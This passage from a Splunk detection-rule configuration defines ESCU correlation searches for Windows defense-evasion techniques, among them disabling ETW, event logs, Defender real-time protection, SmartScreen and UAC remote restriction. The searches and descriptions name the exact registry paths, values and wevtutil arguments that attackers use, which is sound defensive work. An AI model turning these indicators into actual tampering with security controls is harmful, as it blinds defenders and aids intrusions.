action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Disable ETW Through Registry - Rule action.correlationsearch.annotations = {"analytic_story": ["Ransomware", "CISA AA23-347A", "Windows Registry Abuse"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search is to identify modification in registry to disable ETW windows feature to evade detections. This technique was seen in several ransomware, RAT and even APT to impaire defenses of the compromise machine and to be able to execute payload with minimal alert as much as possible. action.notable.param.rule_title = Disable ETW Through Registry action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path= "*\\SOFTWARE\\Microsoft\\.NETFramework\\ETWEnabled" Registry.registry_value_data = "0x00000000") BY _time span=1h Registry.dest Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disable_etw_through_registry_filter` [ESCU - Disable Logs Using WevtUtil - Rule] action.escu = 0 action.escu.enabled = 1 description = This search is to detect execution of wevtutil.exe to disable logs. This technique was seen in several ransomware to disable the event logs to evade alerts and detections. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1070", "T1070.001"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search is to detect execution of wevtutil.exe to disable logs. This technique was seen in several ransomware to disable the event logs to evade alerts and detections. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = network operator may disable audit event logs for debugging purposes. action.escu.creation_date = 2023-12-27 action.escu.modification_date = 2023-12-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Disable Logs Using WevtUtil - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Ransomware", "CISA AA23-347A", "Rhysida Ransomware"] action.risk = 1 action.risk.param._risk_message = WevtUtil.exe used to disable Event Logging on $dest action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 24}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Disable Logs Using WevtUtil - Rule action.correlationsearch.annotations = {"analytic_story": ["Ransomware", "CISA AA23-347A", "Rhysida Ransomware"], "cis20": ["CIS 10"], "confidence": 80, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1070", "T1070.001"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search is to detect execution of wevtutil.exe to disable logs. This technique was seen in several ransomware to disable the event logs to evade alerts and detections. action.notable.param.rule_title = Disable Logs Using WevtUtil action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name = "wevtutil.exe" Processes.process = "*sl*" Processes.process = "*/e:false*" by Processes.parent_process_name Processes.parent_process Processes.process_name Processes.process Processes.dest Processes.user Processes.process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disable_logs_using_wevtutil_filter` [ESCU - Disable Registry Tool - Rule] action.escu = 0 action.escu.enabled = 1 description = This search identifies modification of registry to disable the regedit or registry tools of the windows operating system. Since registry tool is a swiss knife in analyzing registry, malware such as RAT or trojan Spy disable this application to prevent the removal of their registry entry such as persistence, file less components and defense evasion. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562", "T1112"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search identifies modification of registry to disable the regedit or registry tools of the windows operating system. Since registry tool is a swiss knife in analyzing registry, malware such as RAT or trojan Spy disable this application to prevent the removal of their registry entry such as persistence, file less components and defense evasion. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the registry value name, registry path, and registry value data from your endpoints. If you are using Sysmon, you must have at least version 2.0 of the offical Sysmon TA. https://splunkbase.splunk.com/app/5709 action.escu.known_false_positives = admin may disable this application for non technical user. action.escu.creation_date = 2023-04-27 action.escu.modification_date = 2023-04-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Disable Registry Tool - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Windows Defense Evasion Tactics", "Windows Registry Abuse", "NjRAT"] action.risk = 1 action.risk.param._risk_message = Disabled Registry Tools on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 40}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Disable Registry Tool - Rule action.correlationsearch.annotations = {"analytic_story": ["Windows Defense Evasion Tactics", "Windows Registry Abuse", "NjRAT"], "cis20": ["CIS 10"], "confidence": 100, "impact": 40, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562", "T1112"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search identifies modification of registry to disable the regedit or registry tools of the windows operating system. Since registry tool is a swiss knife in analyzing registry, malware such as RAT or trojan Spy disable this application to prevent the removal of their registry entry such as persistence, file less components and defense evasion. action.notable.param.rule_title = Disable Registry Tool action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path= "*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableRegistryTools" Registry.registry_value_data = "0x00000001") BY _time span=1h Registry.user Registry.dest Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)`| where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disable_registry_tool_filter` [ESCU - Disable Schedule Task - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic is to detect a suspicious commandline to disable existing schedule task. This technique is used by adversaries or commodity malware like IcedID to disable security application (AV products) in the targetted host to evade detections. This TTP is a good pivot to check further why and what other process run before and after this detection. check which process execute the commandline and what task is disabled. parent child process is quite valuable in this scenario too. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic is to detect a suspicious commandline to disable existing schedule task. This technique is used by adversaries or commodity malware like IcedID to disable security application (AV products) in the targetted host to evade detections. This TTP is a good pivot to check further why and what other process run before and after this detection. check which process execute the commandline and what task is disabled. parent child process is quite valuable in this scenario too. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = admin may disable problematic schedule task action.escu.creation_date = 2021-10-18 action.escu.modification_date = 2021-10-18 action.escu.confidence = high action.escu.full_search_name = ESCU - Disable Schedule Task - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["IcedID", "Living Off The Land"] action.risk = 1 action.risk.param._risk_message = schtask process with commandline $process$ to disable schedule task in $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 56}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Disable Schedule Task - Rule action.correlationsearch.annotations = {"analytic_story": ["IcedID", "Living Off The Land"], "cis20": ["CIS 10"], "confidence": 80, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic is to detect a suspicious commandline to disable existing schedule task. This technique is used by adversaries or commodity malware like IcedID to disable security application (AV products) in the targetted host to evade detections. This TTP is a good pivot to check further why and what other process run before and after this detection. check which process execute the commandline and what task is disabled. parent child process is quite valuable in this scenario too. action.notable.param.rule_title = Disable Schedule Task action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=schtasks.exe Processes.process=*/change* Processes.process=*/disable* by Processes.user Processes.process_name Processes.process Processes.parent_process_name Processes.parent_process Processes.dest | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disable_schedule_task_filter` [ESCU - Disable Security Logs Using MiniNt Registry - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic is to detect a suspicious registry modification to disable security audit logs. This technique was shared by a researcher to disable Security logs of windows by adding this registry. The Windows will think it is WinPE and will not log any event to the Security Log action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1112"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic is to detect a suspicious registry modification to disable security audit logs. This technique was shared by a researcher to disable Security logs of windows by adding this registry. The Windows will think it is WinPE and will not log any event to the Security Log action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the registry value name, registry path, and registry value data from your endpoints. If you are using Sysmon, you must have at least version 2.0 of the offical Sysmon TA. https://splunkbase.splunk.com/app/5709 action.escu.known_false_positives = Unknown. action.escu.creation_date = 2023-12-27 action.escu.modification_date = 2023-12-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Disable Security Logs Using MiniNt Registry - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Windows Defense Evasion Tactics", "CISA AA23-347A", "Windows Registry Abuse"] action.risk = 1 action.risk.param._risk_message = Modified/added/deleted registry entry $registry_path$ in $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 80}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Disable Security Logs Using MiniNt Registry - Rule action.correlationsearch.annotations = {"analytic_story": ["Windows Defense Evasion Tactics", "CISA AA23-347A", "Windows Registry Abuse"], "cis20": ["CIS 10"], "confidence": 100, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1112"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic is to detect a suspicious registry modification to disable security audit logs. This technique was shared by a researcher to disable Security logs of windows by adding this registry. The Windows will think it is WinPE and will not log any event to the Security Log action.notable.param.rule_title = Disable Security Logs Using MiniNt Registry action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path="*\\Control\\MiniNt\\*") BY _time span=1h Registry.user Registry.dest Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disable_security_logs_using_minint_registry_filter` [ESCU - Disable Show Hidden Files - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic is to identify a modification in the Windows registry to prevent users from seeing all the files with hidden attributes. This event or techniques are known on some worm and trojan spy malware that will drop hidden files on the infected machine. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1564.001", "T1562.001", "T1564", "T1562", "T1112"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic is to identify a modification in the Windows registry to prevent users from seeing all the files with hidden attributes. This event or techniques are known on some worm and trojan spy malware that will drop hidden files on the infected machine. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the registry value name, registry path, and registry value data from your endpoints. If you are using Sysmon, you must have at least version 2.0 of the offical Sysmon TA. https://splunkbase.splunk.com/app/5709 action.escu.known_false_positives = unknown action.escu.creation_date = 2024-02-14 action.escu.modification_date = 2024-02-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Disable Show Hidden Files - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Windows Defense Evasion Tactics", "Windows Registry Abuse", "Azorult"] action.risk = 1 action.risk.param._risk_message = Disabled 'Show Hidden Files' on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 40}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Disable Show Hidden Files - Rule action.correlationsearch.annotations = {"analytic_story": ["Windows Defense Evasion Tactics", "Windows Registry Abuse", "Azorult"], "cis20": ["CIS 10"], "confidence": 100, "impact": 40, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1564.001", "T1562.001", "T1564", "T1562", "T1112"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path= "*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Hidden" OR (Registry.registry_path= "*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\HideFileExt" Registry.registry_value_data = "0x00000001") OR (Registry.registry_path= "*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\ShowSuperHidden" Registry.registry_value_data = "0x00000000" )) BY _time span=1h Registry.user Registry.dest Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disable_show_hidden_files_filter` [ESCU - Disable UAC Remote Restriction - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic is to detect a suspicious modification of registry to disable UAC remote restriction. This technique was well documented in Microsoft page where attacker may modify this registry value to bypassed UAC feature of windows host. This is a good indicator that some tries to bypassed UAC to suspicious process or gain privilege escalation. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.002", "T1548"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic is to detect a suspicious modification of registry to disable UAC remote restriction. This technique was well documented in Microsoft page where attacker may modify this registry value to bypassed UAC feature of windows host. This is a good indicator that some tries to bypassed UAC to suspicious process or gain privilege escalation. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the registry value name, registry path, and registry value data from your endpoints. If you are using Sysmon, you must have at least version 2.0 of the offical Sysmon TA. https://splunkbase.splunk.com/app/5709 action.escu.known_false_positives = admin may set this policy for non-critical machine. action.escu.creation_date = 2023-12-27 action.escu.modification_date = 2023-12-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Disable UAC Remote Restriction - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Suspicious Windows Registry Activities", "Windows Defense Evasion Tactics", "CISA AA23-347A", "Windows Registry Abuse"] action.risk = 1 action.risk.param._risk_message = Modified/added/deleted registry entry $registry_path$ in $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 80}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Disable UAC Remote Restriction - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious Windows Registry Activities", "Windows Defense Evasion Tactics", "CISA AA23-347A", "Windows Registry Abuse"], "cis20": ["CIS 10"], "confidence": 100, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.002", "T1548"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic is to detect a suspicious modification of registry to disable UAC remote restriction. This technique was well documented in Microsoft page where attacker may modify this registry value to bypassed UAC feature of windows host. This is a good indicator that some tries to bypassed UAC to suspicious process or gain privilege escalation. action.notable.param.rule_title = Disable UAC Remote Restriction action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path="*\\CurrentVersion\\Policies\\System*" Registry.registry_value_name="LocalAccountTokenFilterPolicy" Registry.registry_value_data="0x00000001" ) BY _time span=1h Registry.user Registry.dest Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)`| where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disable_uac_remote_restriction_filter` [ESCU - Disable Windows App Hotkeys - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic detects a suspicious registry modification to disable Windows hotkey (shortcut keys) for native Windows applications. This technique is commonly used to disable certain or several Windows applications like `taskmgr.exe` and `cmd.exe`. This technique is used to impair the analyst in analyzing and removing the attacker implant in compromised systems. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562", "T1112"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic detects a suspicious registry modification to disable Windows hotkey (shortcut keys) for native Windows applications. This technique is commonly used to disable certain or several Windows applications like `taskmgr.exe` and `cmd.exe`. This technique is used to impair the analyst in analyzing and removing the attacker implant in compromised systems. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the registry value name, registry path, and registry value data from your endpoints. If you are using Sysmon, you must have at least version 2.0 of the offical Sysmon TA. https://splunkbase.splunk.com/app/5709 action.escu.known_false_positives = unknown action.escu.creation_date = 2023-04-27 action.escu.modification_date = 2023-04-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Disable Windows App Hotkeys - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["XMRig", "Windows Registry Abuse"] action.risk = 1 action.risk.param._risk_message = Disabled 'Windows App Hotkeys' on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 40}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Disable Windows App Hotkeys - Rule action.correlationsearch.annotations = {"analytic_story": ["XMRig", "Windows Registry Abuse"], "cis20": ["CIS 10"], "confidence": 100, "impact": 40, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562", "T1112"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic detects a suspicious registry modification to disable Windows hotkey (shortcut keys) for native Windows applications. This technique is commonly used to disable certain or several Windows applications like `taskmgr.exe` and `cmd.exe`. This technique is used to impair the analyst in analyzing and removing the attacker implant in compromised systems. action.notable.param.rule_title = Disable Windows App Hotkeys action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path="*\\Windows NT\\CurrentVersion\\Image File Execution Options\\*" AND Registry.registry_value_data= "HotKey Disabled" AND Registry.registry_value_name = "Debugger") BY _time span=1h Registry.dest Registry.user Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disable_windows_app_hotkeys_filter` [ESCU - Disable Windows Behavior Monitoring - Rule] action.escu = 0 action.escu.enabled = 1 description = This search is to identifies a modification in registry to disable the windows denfender real time behavior monitoring. This event or technique is commonly seen in RAT, bot, or Trojan to disable AV to evade detections. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search is to identifies a modification in registry to disable the windows denfender real time behavior monitoring. This event or technique is commonly seen in RAT, bot, or Trojan to disable AV to evade detections. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the registry value name, registry path, and registry value data from your endpoints. If you are using Sysmon, you must have at least version 2.0 of the offical Sysmon TA. https://splunkbase.splunk.com/app/5709 action.escu.known_false_positives = admin or user may choose to disable this windows features. action.escu.creation_date = 2023-12-27 action.escu.modification_date = 2023-12-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Disable Windows Behavior Monitoring - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Azorult", "Ransomware", "Windows Registry Abuse", "RedLine Stealer", "Windows Defense Evasion Tactics", "CISA AA23-347A", "Revil Ransomware"] action.risk = 1 action.risk.param._risk_message = Windows Defender real time behavior monitoring disabled on $dest action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 40}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Disable Windows Behavior Monitoring - Rule action.correlationsearch.annotations = {"analytic_story": ["Azorult", "Ransomware", "Windows Registry Abuse", "RedLine Stealer", "Windows Defense Evasion Tactics", "CISA AA23-347A", "Revil Ransomware"], "cis20": ["CIS 10"], "confidence": 100, "impact": 40, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search is to identifies a modification in registry to disable the windows denfender real time behavior monitoring. This event or technique is commonly seen in RAT, bot, or Trojan to disable AV to evade detections. action.notable.param.rule_title = Disable Windows Behavior Monitoring action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path= "*\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\\DisableBehaviorMonitoring" OR Registry.registry_path= "*\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\\DisableOnAccessProtection" OR Registry.registry_path= "*\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\\DisableScanOnRealtimeEnable" OR Registry.registry_path= "*\\SOFTWARE\\Microsoft\\Windows Defender\\Real-Time Protection\\DisableRealtimeMonitoring" OR Registry.registry_path= "*\\Real-Time Protection\\DisableIntrusionPreventionSystem" OR Registry.registry_path= "*\\Real-Time Protection\\DisableIOAVProtection" OR Registry.registry_path= "*\\Real-Time Protection\\DisableScriptScanning" AND Registry.registry_value_data = "0x00000001") BY _time span=1h Registry.dest Registry.user Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disable_windows_behavior_monitoring_filter` [ESCU - Disable Windows SmartScreen Protection - Rule] action.escu = 0 action.escu.enabled = 1 description = The following search identifies a modification of registry to disable the smartscreen protection of windows machine. This is windows feature provide an early warning system against website that might engage in phishing attack or malware distribution. This modification are seen in RAT malware to cover their tracks upon downloading other of its component or other payload. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following search identifies a modification of registry to disable the smartscreen protection of windows machine. This is windows feature provide an early warning system against website that might engage in phishing attack or malware distribution. This modification are seen in RAT malware to cover their tracks upon downloading other of its component or other payload. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the registry value name, registry path, and registry value data from your endpoints. If you are using Sysmon, you must have at least version 2.0 of the offical Sysmon TA. https://splunkbase.splunk.com/app/5709 action.escu.known_false_positives = admin or user may choose to disable this windows features. action.escu.creation_date = 2024-02-14 action.escu.modification_date = 2024-02-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Disable Windows SmartScreen Protection - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Windows Defense Evasion Tactics", "CISA AA23-347A", "Windows Registry Abuse"] action.risk = 1 action.risk.param._risk_message = The Windows Smartscreen was disabled on $dest$ by $user$. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Disable Windows SmartScreen Protection - Rule action.correlationsearch.annotations = {"analytic_story": ["Windows Defense Evasion Tactics", "CISA AA23-347A", "Windows Registry Abuse"], "cis20": ["CIS 10"], "confidence": 50, 